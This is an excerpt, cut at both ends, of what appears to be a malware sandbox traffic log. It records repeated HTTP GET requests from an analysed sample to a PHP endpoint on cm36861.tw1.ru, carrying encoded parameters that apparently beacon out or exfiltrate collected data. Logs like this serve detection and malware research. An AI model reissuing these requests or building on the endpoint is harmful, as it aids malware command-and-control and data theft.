iVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: 